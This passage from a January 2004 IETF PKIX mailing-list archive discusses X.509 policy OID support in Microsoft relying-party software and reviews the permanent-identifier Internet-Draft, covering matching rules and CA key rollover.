a policy option during the chain building process through the CertGetCertificateChain() API as a parameter in the CHAIN PARA structure. Reference: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/securit y/security/certgetcertificatechain.asp At this time, Internet Explorer, Outlook, IIS etc. do not support configuration of this policy parameter...frankly due to the fact that there is no end user demand for such a feature. Arguably the demand does not exist as nobody in my family could possibly understand what a policy OID is and what it means to them. However, Windows Server 2003 IAS Server component (RADIUS/Remote Access Server) does support admin configuration of allowed policy OIDs by the administrator on the server. In this particular case, it is an interesting case with quite some utility as it allows an organization to very discretely define which authentication certs would be allowed for VPN, etc. For example, certificates issued to smartcards incorporates policy OID foo while authentication certs to software based key stores incorporates policy OID bar, the remote access server may require that only smartcard based certs may be used for access. David B. Cross -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Anders Rundgren Sent: Tuesday, January 27, 2004 2:45 AM To: ietf-pkix@imc.org Subject: Setting X.509 Policy Data in IE, IIS, Outlook It has been touted that policy OIDs are essntial for building PKIs. However, I have not found any place where you can can set the policy filtering in relying party apps like MSIE, IIS, or Outlook. I would be interested to know when this feature will be available and how the policy-OID-related processes are supposed to work from an end-user perspective. In case there are such application features available from other vendors, I would be interested in how they have addresses this issue. In particular, what you do after "installing" a trust anhcor does not seem to be an not entirely straightforward matter unless you do a lot of assumptions. Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RJX5cX051974; Tue, 27 Jan 2004 11:33:05 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0RJX5w8051973; Tue, 27 Jan 2004 11:33:05 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av3-2-sn1.fre.skanova.net (av3-2-sn1.fre.skanova.net [81.228.11.110]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RJX4nT051954 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 11:33:05 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av3-2-sn1.fre.skanova.net (Postfix, from userid 502) id CCBB137EBD; Tue, 27 Jan 2004 20:33:00 +0100 (CET) Received: from smtp4.hy.skanova.net (smtp4.hy.skanova.net [195.67.199.133]) by av3-2-sn1.fre.skanova.net (Postfix) with ESMTP id B961D37EBD; Tue, 27 Jan 2004 20:33:00 +0100 (CET) Received: from arport (t7o913p64.telia.com [213.64.26.64]) by smtp4.hy.skanova.net (8.12.10/8.12.10) with SMTP id i0RJWs87022434; Tue, 27 Jan 2004 20:32:54 +0100 (CET) Message-ID: <005001c3e50b$9cddac00$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: "Stephen Kent" <kent@bbn.com> Cc: <ietf-pkix@imc.org> References: <020201c3e4c2$90d03b60$0500a8c0@arport> <p06020403bc3c20462220@[128.89.89.75]> <041c01c3e4eb$a5411820$0500a8c0@arport> <p06020409bc3c3f827415@[128.89.89.75]> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Date: Tue, 27 Jan 2004 20:27:27 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> >>A "compliant management interface for the security policy database" >>for X.509 would be fun to review. As far as I can see, the X.509 >>policy mechanisms are flawed to the point where it becomes technically >>infeasible to specify such an interface. But I stay interested if anybody >>dares to challenge that statement with something tangible instead of >>the usual PKI mumbo-jumbo, like "there are many ways to do this". >A challenge with no apparent reward to motivate a response, as usual ... May I help you with some analysis? PKI projects historically started with the CA, and this has influenced some PKI standards as well, the RFC3280 policy support is a prime example of that. However, being a CA, is being an "information producer" which is considerably easier than being an "information consumer" as only the latter has to "interpret" and maybe "act" upon what the information producer says. If the designers of the policy system instead had focused on the relying party (the "information consumer"), they had probably realized that a relying party consists of 1) the relying party software 2) the people depending on the relying party software. Further analysis shows that the "people" category, except in the most trivial scenarios, consists of "trust administrators" and "end users". In the background there are also some legal folks lurking around. If you then apply the design constraint that all these entities should have the best possible system adapted for the entities' actual tasks and competence, you would end-up with a very different policy scheme. Commercial CAs know that, and therefore with few exceptions, continue to ignore a system that was not designed with the "customer in mind". The major difference is that policy in commercial CAs is associated with the CA, eliminating the need for moving trust processing and trust administration tasks into the application and user domains respectively. This enables the creation of shrink-wrap RP software as well as shielding end-users from too close encounters with PKI. This also allows trust admins to anytime, using "CA properties", view what "they actually currently trust", without having a single EE certificate! Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RGOYkX037139; Tue, 27 Jan 2004 08:24:35 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0RGOYQR037138; Tue, 27 Jan 2004 08:24:34 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from aragorn.bbn.com (aragorn.bbn.com [128.33.0.62]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RGOXHM037128 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 08:24:33 -0800 (PST) (envelope-from kent@bbn.com) Received: from [128.89.89.75] (dhcp89-089-075.bbn.com [128.89.89.75]) by aragorn.bbn.com (8.12.7/8.12.7) with ESMTP id i0RGOSM9015011; Tue, 27 Jan 2004 11:24:29 -0500 (EST) Mime-Version: 1.0 X-Sender: kent@po2.bbn.com Message-Id: <p06020409bc3c3f827415@[128.89.89.75]> In-Reply-To: <041c01c3e4eb$a5411820$0500a8c0@arport> References: <020201c3e4c2$90d03b60$0500a8c0@arport> <p06020403bc3c20462220@[128.89.89.75]> <041c01c3e4eb$a5411820$0500a8c0@arport> Date: Tue, 27 Jan 2004 11:19:56 -0500 To: "Anders Rundgren" <anders.rundgren@telia.com> From: Stephen Kent <kent@bbn.com> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Cc: <ietf-pkix@imc.org> Content-Type: text/plain; charset="us-ascii" ; format="flowed" X-Scanned-By: MIMEDefang 2.28 (www . roaringpenguin . com / mimedefang) Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> At 16:38 +0100 1/27/04, Anders Rundgren wrote: > >>However, I have not found any place where you can set the >>>policy filtering in relying party apps like MSIE, IIS, or Outlook. > >>well, if you choose MS products as a good example of anything, you >>are likely to be disappointed :-) for example, the Windows >>implementation of IPsec does not provide a compliant management >>interface for the security policy database. > >Although "MS-bashing" seems to be "come-il-faut" these days, >it would be a bit more interesting to hear how "the good guys" >(whatever that means), handle policy settings. "MS-bashing" is not even a hobby, as it offers no challenge. but holding up any MS product as a reference for how a security function should be performed is the epitome of silliness, and warrants comment. >Borrowing from your IPsec complaints: >A "compliant management interface for the security policy database" >for X.509 would be fun to review. As far as I can see, the X.509 >policy mechanisms are flawed to the point where it becomes technically >infeasible to specify such an interface. But I stay interested if anybody >dares to challenge that statement with something tangible instead of >the usual PKI mumbo-jumbo, like "there are many ways to do this". A challenge with no apparent reward to motivate a response, as usual ... Steve Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RFiI4h034395; Tue, 27 Jan 2004 07:44:18 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0RFiItc034394; Tue, 27 Jan 2004 07:44:18 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av5-2-sn1.fre.skanova.net (av5-2-sn1.fre.skanova.net [81.228.11.112]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RFiHHE034385 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 07:44:18 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av5-2-sn1.fre.skanova.net (Postfix, from userid 502) id 055CF37EBB; Tue, 27 Jan 2004 16:44:10 +0100 (CET) Received: from smtp5.hy.skanova.net (smtp5.hy.skanova.net [195.67.199.134]) by av5-2-sn1.fre.skanova.net (Postfix) with ESMTP id DF70537E4B; Tue, 27 Jan 2004 16:44:10 +0100 (CET) Received: from arport (t8o913p35.telia.com [213.64.26.155]) by smtp5.hy.skanova.net (8.12.10/8.12.10) with SMTP id i0RFi97N023046; Tue, 27 Jan 2004 16:44:09 +0100 (CET) Message-ID: <041c01c3e4eb$a5411820$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: "Stephen Kent" <kent@bbn.com> Cc: <ietf-pkix@imc.org> References: <020201c3e4c2$90d03b60$0500a8c0@arport> <p06020403bc3c20462220@[128.89.89.75]> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Date: Tue, 27 Jan 2004 16:38:42 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> >>However, I have not found any place where you can set the >>policy filtering in relying party apps like MSIE, IIS, or Outlook. >well, if you choose MS products as a good example of anything, you >are likely to be disappointed :-) for example, the Windows >implementation of IPsec does not provide a compliant management >interface for the security policy database. Although "MS-bashing" seems to be "come-il-faut" these days, it would be a bit more interesting to hear how "the good guys" (whatever that means), handle policy settings. Borrowing from your IPsec complaints: A "compliant management interface for the security policy database" for X.509 would be fun to review. As far as I can see, the X.509 policy mechanisms are flawed to the point where it becomes technically infeasible to specify such an interface. But I stay interested if anybody dares to challenge that statement with something tangible instead of the usual PKI mumbo-jumbo, like "there are many ways to do this". Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RE9ih0026888; Tue, 27 Jan 2004 06:09:44 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0RE9iJe026887; Tue, 27 Jan 2004 06:09:44 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from aragorn.bbn.com (aragorn.bbn.com [128.33.0.62]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RE9gfp026875 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 06:09:42 -0800 (PST) (envelope-from kent@bbn.com) Received: from [128.89.89.75] (dhcp89-089-075.bbn.com [128.89.89.75]) by aragorn.bbn.com (8.12.7/8.12.7) with ESMTP id i0RE9bM9005814; Tue, 27 Jan 2004 09:09:37 -0500 (EST) Mime-Version: 1.0 X-Sender: kent@po2.bbn.com Message-Id: <p06020403bc3c20462220@[128.89.89.75]> In-Reply-To: <020201c3e4c2$90d03b60$0500a8c0@arport> References: <020201c3e4c2$90d03b60$0500a8c0@arport> Date: Tue, 27 Jan 2004 09:05:53 -0500 To: "Anders Rundgren" <anders.rundgren@telia.com> From: Stephen Kent <kent@bbn.com> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Cc: <ietf-pkix@imc.org> Content-Type: text/plain; charset="us-ascii" ; format="flowed" X-Scanned-By: MIMEDefang 2.28 (www . roaringpenguin . com / mimedefang) Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> At 11:44 +0100 1/27/04, Anders Rundgren wrote: >It has been touted that policy OIDs are essntial for building PKIs. not true in all cases, maybe not even in most cases. who are you citing? >However, I have not found any place where you can can set the >policy filtering in relying party apps like MSIE, IIS, or Outlook. well, if you choose MS products as a good example of anything, you are likely to be disappointed :-) for example, the Windows implementation of IPsec does not provide a compliant management interface for the security policy database. ... Steve Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RDBntt021560; Tue, 27 Jan 2004 05:11:49 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0RDBn7Z021559; Tue, 27 Jan 2004 05:11:49 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from mtiwmhc12.worldnet.att.net (mtiwmhc12.worldnet.att.net [204.127.131.116]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RDBmLw021550 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 05:11:49 -0800 (PST) (envelope-from chokhani@orionsec.com) Received: from wchokhani (11.washington-27rh16rt-28rh15rt.dc.dial-access.att.net[12.77.42.11]) by worldnet.att.net (mtiwmhc12) with SMTP id <2004012713114011200o70jqe>; Tue, 27 Jan 2004 13:11:41 +0000 From: "Santosh Chokhani" <chokhani@orionsec.com> To: <ietf-pkix@imc.org> Subject: RE: I-D ACTION:draft-ietf-pkix-pi-08.txt Date: Tue, 27 Jan 2004 08:11:35 -0500 Message-ID: <00bc01c3e4d7$17f1f3e0$e82b4d0c@hq.orionsec.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 In-Reply-To: <401662B2.5020303@bull.net> Importance: Normal Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0RDBnLw021553 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Denis: Sounds good to me. Thanks. -----Original Message----- From: Denis Pinkas [mailto:Denis.Pinkas@bull.net] Sent: Tuesday, January 27, 2004 8:08 AM To: Santosh Chokhani Cc: ietf-pkix@imc.org Subject: Re: I-D ACTION:draft-ietf-pkix-pi-08.txt Santosh, > Denis and Tom: > Section 3, Security Considerations, Page 4, paragraph 6 for the > Section, of the RFC contains description of how to match PI when > identifier type is absent. > One of the comparison is that of public keys. While being a good > comparison, it can give you false results in case of CA key roll-over. > Do you think it is worth mentioning. The other match described in the > same epigraph for CA names may have problems also if there are any > self-issued certificates for key roll-over. First of all, your remark is fully correct. The current text is as follows: Since a name is only unique towards its superior CA, unless some naming constraints are being used, a name would only be guaranteed to be globally unique when considered to include a sequence of all the names of the superior CAs. Thus, two certificates which contain a permanent identifier extension without a identifierType may have their permanent identifier extensions compared for equality either by comparing the public key values of the two CAs which have issued these two certificates or by comparing the sequence of CA names in the certification path from the trust anchor to the CA, inclusive. I would propose to replace it with the following text: Since a name is only unique towards its superior CA, unless some naming constraints are being used, a name would only be guaranteed to be globally unique when considered to include a sequence of all the names of the superior CAs. Thus, two certificates that are issued under the same issuer DN and which contain the same permanent identifier extension without a identifierType do not necessarily refer to the same entity. Additional checks need to be done, e.g. to check if the public key values of the two CAs which have issued the certificates to be compared are identical or if the sequence of CA names in the certification path from the trust anchor to the CA are identical. When the above checks fail, the permanents identifiers may still match if there has been a CA key rollover. In such a case the checking is more complicated. Denis > -----Original Message----- > From: owner-ietf-pkix@mail.imc.org > [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Denis Pinkas > Sent: Friday, January 23, 2004 8:14 AM > To: jimsch@exmsft.com > Cc: 'Tom Gindin'; ietf-pkix@imc.org > Subject: Re: I-D ACTION:draft-ietf-pkix-pi-08.txt > > > > Jim, > > Thank you for your document quality checking. > > >>Comments on draft -08. >> >>1. Privacy concerns should be additionally outlined and covered in >>the security considerations section. > > > This point is already covered. Here is the text : > > The permanent identifier allows organizations to create links > between different certificates associated with an entity issued > with or without overlapping validity periods. This ability to link > different certificates may conflict with privacy. It is therefore > important that a CA clearly disclose any plans to issue certificates > which include a permanent identifier to potential subjects of those > certificates. > > >>2. Section 1, para 9: Text here allows for an AA to have a unique URI >>name. Has been removed from the syntax. > > > You were so fast by replying to the publication, that I had not the > time to > advertise the main reason for issuing this new draft. > > It is because the IESG objected to include URI in the document and > that we > (i.e. Tom and myself) have been unable to find a compromise with the IESG. > So we have removed the URI option. You are correct: this sentence should > have been deleted. > > Done. > > >>3. Section 1, para 14: Suggested text "both the same permanent >>identifier value and the same Authority Identifer Value, then these". >>(I find the use of identityType to be confusing since I consider this >>to relate to type choice of IdentifierValue as well.) > > > "identityType" is not used. "identifierType" is used instead. The > ASN.1 for identifierType is : > > identifierType OBJECT IDENTIFIER OPTIONAL > > The current text is: > > "When two certificates from different CA's contain both the same > permanent identifier value and the same type of permanent > identifier from a given Assigner Authority, then these > certificates relate to the same entity, whatever the content of > the DN or other subjectAltName components may be." > > Changing "same type of permanent identifier" by "Authority Identifer > Value" > would not be appropriate. The identifierType does not simply identify the > Authority, but also the type of identifier being used. > > I would propose the following text: > > When two certificates from the same CA or from different CA's > contain both the same permanent identifier value and the same > identifier type value, then these certificates relate to the > same entity, whatever the content of the DN or other subjectAltName > components may be. > > >>4. Section 2: What is the criteria for use of iA5String vs >>uTF8String? > > > Good question. No good answer ! I thus propose to simplify and just > have the > > following: > > PermanentIdentifier ::= SEQUENCE { > identifierValue UTF8String, > identifierType OBJECT IDENTIFIER OPTIONAL } > > Here is the new text for UTF8. > > The IdentifierValue supports one syntax: UTF8String. UTF8String is > variable length data of octets. The UTF8String syntax is used to > express a string of characters from the Universal Character Set > - UCS [ISO10646] (a superset of [Unicode]), encoded following the > [UTF-8] algorithm. The UCS allows support of most of the world's > writing systems using a single character set. > > Note that Unicode characters U+0000 through U+007F are the same as > ASCII 0 through 127, respectively, and have the same single octet > UTF-8 encoding. Other Unicode characters have a multiple octet > UTF-8 encoding. > > >>5. Section 2: When doing comparisons do I need to cross compare >>these two different value items? > > > Added the following: > > The following matching rule SHALL be used for the identifierValue: > the rule evaluates to TRUE if and only if the code points [Unicode] > of each of the characters is equal. > > Also added the following references: > > [Unicode] The Unicode Consortium, "The Unicode Standard, Version > 3.2.0" is defined by "The Unicode Standard, Version 3.0" > (Reading, MA, Addison-Wesley, 2000. ISBN 0-201-61633-5), as amended > by the "Unicode Standard Annex #27: Unicode 3.1" > (http://www.unicode.org/reports/tr27/) and by the "Unicode Standard > Annex #28: Unicode 3.2" (http://www.unicode.org/reports/tr28/). > > [ISO10646] Universal Multiple-Octet Coded Character Set (UCS) - > Architecture and Basic Multilingual Plane, ISO/IEC 10646-1: 1993. > > [UTF-8] RFC 2279. F. Yergeau. UTF-8, a transformation format of > ISO 10646, January 1998. > > >>6. Section 2: The statement 'It is an OID.' is redundant and can be >>removed. > > > OK. Forgotten. > > >>7. Section 3: Contains a paragraph dealing with matching rules. >>Since this is no longer a field in the structure the paragraph should >>be re-written to state what the one and only matching rule is. > > > See the response to the issue number 5. > > >>8. Appendix A.1: New request, please put a reference to the document >>containing the pkix module into the pkix document (i.e. something like >>"-- found in [RFC 3280]". This prevents documents from importing >>modules that are lower in the standards process without having any >>explicit reference to them. > > > Added: > > -- from [RFC 3280] > > Before I update the document and place it on the web server, I would > be > grateful to get your response on these proposals. > > Denis > > >>jim >> >> >> >> >>>-----Original Message----- >>>From: owner-ietf-pkix@mail.imc.org >>>[mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of >>>Internet-Drafts@ietf.org >>>Sent: Wednesday, January 21, 2004 1:27 PM >>>To: IETF-Announce: >>>Cc: ietf-pkix@imc.org >>>Subject: I-D ACTION:draft-ietf-pkix-pi-08.txt >>> >>> >>>A New Internet-Draft is available from the on-line Internet-Drafts >>>directories. This draft is a work item of the Public-Key >>>Infrastructure (X.509) Working Group of the IETF. >>> >>> Title : Internet X.509 Public Key >>>Infrastructure Permanent Identifier >>> Author(s) : D. Pinkas, T. Gindin >>> Filename : draft-ietf-pkix-pi-08.txt >>> Pages : 12 >>> Date : 2004-1-21 >>> >>>This document define a new form of name, called permanent identifier, >>>that may be included in the subjectAltName extension of a public key >>>certificate issued to an entity. The permanent identifier is an >>>optional feature that may be used by a CA to indicate that the >>>certificate relates to the same entity even if the name or the >>>affiliation of that entity stored in the subject or another name form >>>in the subjectAltName extension has changed. >>>The subject name, carried in the subject field, is only unique >>>for each subject entity certified by the one CA as defined by the >>>issuer name field. Also, the new name form can carry a >>>name that is unique for each subject entity certified by a CA. >>> >>>A URL for this Internet-Draft is: >>>http://www.ietf.org/internet-drafts/draft-> ietf-pkix-pi-08.txt >>> >>> >>>To remove yourself from the IETF >>>Announcement list, send a message to >>>ietf-announce-request with the word unsubscribe in the body >>>of the message. >>> >>>Internet-Drafts are also available by anonymous FTP. Login with the >>>username "anonymous" and a password of your e-mail address. After >>>logging in, type "cd internet-drafts" and then >>> "get draft-ietf-pkix-pi-08.txt". >>> >>>A list of Internet-Drafts directories can be found in >> >>http://www.ietf.org/shadow.html >>or ftp://ftp.ietf.org/ietf/1shadow-sites.txt >> >> >>Internet-Drafts can also be obtained by e-mail. >> >>Send a message to: >> mailserv@ietf.org. >>In the body type: >> "FILE /internet-drafts/draft-ietf-pkix-pi-08.txt". >> >>NOTE: The mail server at ietf.org can return the document in >> MIME-encoded form by using the "mpack" utility. To use this >> feature, insert the command "ENCODING mime" before the "FILE" >> command. To decode the response(s), you will need "munpack" or >> a MIME-compliant mail reader. Different MIME-compliant mail readers >> exhibit different behavior, especially when dealing with >> "multipart" MIME messages (i.e. documents which have been split >> up into multiple messages), so check your local documentation on >> how to manipulate these messages. >> >> >>Below is the data which will enable a MIME compliant mail reader >>implementation to automatically retrieve the ASCII version of the >>Internet-Draft. >> >> > > > > Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RD891Y021219; Tue, 27 Jan 2004 05:08:09 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0RD89wq021218; Tue, 27 Jan 2004 05:08:09 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from odin2.bull.net (odin2.bull.net [192.90.70.84]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RD85i9021211 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 05:08:07 -0800 (PST) (envelope-from Denis.Pinkas@bull.net) Received: from clbull.frcl.bull.fr (IDENT:root@clbull.frcl.bull.fr [129.182.8.31]) by odin2.bull.net (8.9.3/8.9.3) with ESMTP id OAA37894; Tue, 27 Jan 2004 14:15:41 +0100 Received: from bull.net (frcls4013.frcl.bull.fr [129.182.108.120]) by clbull.frcl.bull.fr (8.9.3/8.9.3) with ESMTP id PAA28927; Tue, 27 Jan 2004 15:03:21 +0100 Message-ID: <401662B2.5020303@bull.net> Date: Tue, 27 Jan 2004 14:08:02 +0100 From: Denis Pinkas <Denis.Pinkas@bull.net> Organization: Bull SA. User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0 X-Accept-Language: en-us, en, fr MIME-Version: 1.0 To: Santosh Chokhani <chokhani@orionsec.com> CC: ietf-pkix@imc.org Subject: Re: I-D ACTION:draft-ietf-pkix-pi-08.txt References: <022501c3e1c8$8e3850b0$4a404d0c@hq.orionsec.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Santosh, > Denis and Tom: > Section 3, Security Considerations, Page 4, paragraph 6 for the Section, of > the RFC contains description of how to match PI when identifier type is > absent. > One of the comparison is that of public keys. While being a good > comparison, it can give you false results in case of CA key roll-over. Do > you think it is worth mentioning. The other match described in the same > epigraph for CA names may have problems also if there are any self-issued > certificates for key roll-over. First of all, your remark is fully correct. The current text is as follows: Since a name is only unique towards its superior CA, unless some naming constraints are being used, a name would only be guaranteed to be globally unique when considered to include a sequence of all the names of the superior CAs. Thus, two certificates which contain a permanent identifier extension without a identifierType may have their permanent identifier extensions compared for equality either by comparing the public key values of the two CAs which have issued these two certificates or by comparing the sequence of CA names in the certification path from the trust anchor to the CA, inclusive. I would propose to replace it with the following text: Since a name is only unique towards its superior CA, unless some naming constraints are being used, a name would only be guaranteed to be globally unique when considered to include a sequence of all the names of the superior CAs. Thus, two certificates that are issued under the same issuer DN and which contain the same permanent identifier extension without a identifierType do not necessarily refer to the same entity. Additional checks need to be done, e.g. to check if the public key values of the two CAs which have issued the certificates to be compared are identical or if the sequence of CA names in the certification path from the trust anchor to the CA are identical. When the above checks fail, the permanents identifiers may still match if there has been a CA key rollover. In such a case the checking is more complicated. Denis > -----Original Message----- > From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On > Behalf Of Denis Pinkas > Sent: Friday, January 23, 2004 8:14 AM > To: jimsch@exmsft.com > Cc: 'Tom Gindin'; ietf-pkix@imc.org > Subject: Re: I-D ACTION:draft-ietf-pkix-pi-08.txt > > > > Jim, > > Thank you for your document quality checking. > > >>Comments on draft -08. >> >>1. Privacy concerns should be additionally outlined and covered in >>the security considerations section. > > > This point is already covered. Here is the text : > > The permanent identifier allows organizations to create links > between different certificates associated with an entity issued > with or without overlapping validity periods. This ability to link > different certificates may conflict with privacy. It is therefore > important that a CA clearly disclose any plans to issue certificates > which include a permanent identifier to potential subjects of those > certificates. > > >>2. Section 1, para 9: Text here allows for an AA to have a unique URI >>name. Has been removed from the syntax. > > > You were so fast by replying to the publication, that I had not the time to > advertise the main reason for issuing this new draft. > > It is because the IESG objected to include URI in the document and that we > (i.e. Tom and myself) have been unable to find a compromise with the IESG. > So we have removed the URI option. You are correct: this sentence should > have been deleted. > > Done. > > >>3. Section 1, para 14: Suggested text "both the same permanent >>identifier value and the same Authority Identifer Value, then these". >>(I find the use of identityType to be confusing since I consider this >>to relate to type choice of IdentifierValue as well.) > > > "identityType" is not used. "identifierType" is used instead. The ASN.1 for > identifierType is : > > identifierType OBJECT IDENTIFIER OPTIONAL > > The current text is: > > "When two certificates from different CA's contain both the same > permanent identifier value and the same type of permanent > identifier from a given Assigner Authority, then these > certificates relate to the same entity, whatever the content of > the DN or other subjectAltName components may be." > > Changing "same type of permanent identifier" by "Authority Identifer Value" > would not be appropriate. The identifierType does not simply identify the > Authority, but also the type of identifier being used. > > I would propose the following text: > > When two certificates from the same CA or from different CA's > contain both the same permanent identifier value and the same > identifier type value, then these certificates relate to the > same entity, whatever the content of the DN or other subjectAltName > components may be. > > >>4. Section 2: What is the criteria for use of iA5String vs >>uTF8String? > > > Good question. No good answer ! I thus propose to simplify and just have the > > following: > > PermanentIdentifier ::= SEQUENCE { > identifierValue UTF8String, > identifierType OBJECT IDENTIFIER OPTIONAL } > > Here is the new text for UTF8. > > The IdentifierValue supports one syntax: UTF8String. UTF8String is > variable length data of octets. The UTF8String syntax is used to > express a string of characters from the Universal Character Set > - UCS [ISO10646] (a superset of [Unicode]), encoded following the > [UTF-8] algorithm. The UCS allows support of most of the world's > writing systems using a single character set. > > Note that Unicode characters U+0000 through U+007F are the same as > ASCII 0 through 127, respectively, and have the same single octet > UTF-8 encoding. Other Unicode characters have a multiple octet > UTF-8 encoding. > > >>5. Section 2: When doing comparisons do I need to cross compare >>these two different value items? > > > Added the following: > > The following matching rule SHALL be used for the identifierValue: > the rule evaluates to TRUE if and only if the code points [Unicode] > of each of the characters is equal. > > Also added the following references: > > [Unicode] The Unicode Consortium, "The Unicode Standard, Version > 3.2.0" is defined by "The Unicode Standard, Version 3.0" > (Reading, MA, Addison-Wesley, 2000. ISBN 0-201-61633-5), as amended > by the "Unicode Standard Annex #27: Unicode 3.1" > (http://www.unicode.org/reports/tr27/) and by the "Unicode Standard > Annex #28: Unicode 3.2" (http://www.unicode.org/reports/tr28/). > > [ISO10646] Universal Multiple-Octet Coded Character Set (UCS) - > Architecture and Basic Multilingual Plane, ISO/IEC 10646-1: 1993. > > [UTF-8] RFC 2279. F. Yergeau. UTF-8, a transformation format of > ISO 10646, January 1998. > > >>6. Section 2: The statement 'It is an OID.' is redundant and can be >>removed. > > > OK. Forgotten. > > >>7. Section 3: Contains a paragraph dealing with matching rules. >>Since this is no longer a field in the structure the paragraph should >>be re-written to state what the one and only matching rule is. > > > See the response to the issue number 5. > > >>8. Appendix A.1: New request, please put a reference to the document >>containing the pkix module into the pkix document (i.e. something like >>"-- found in [RFC 3280]". This prevents documents from importing >>modules that are lower in the standards process without having any >>explicit reference to them. > > > Added: > > -- from [RFC 3280] > > Before I update the document and place it on the web server, I would be > grateful to get your response on these proposals. > > 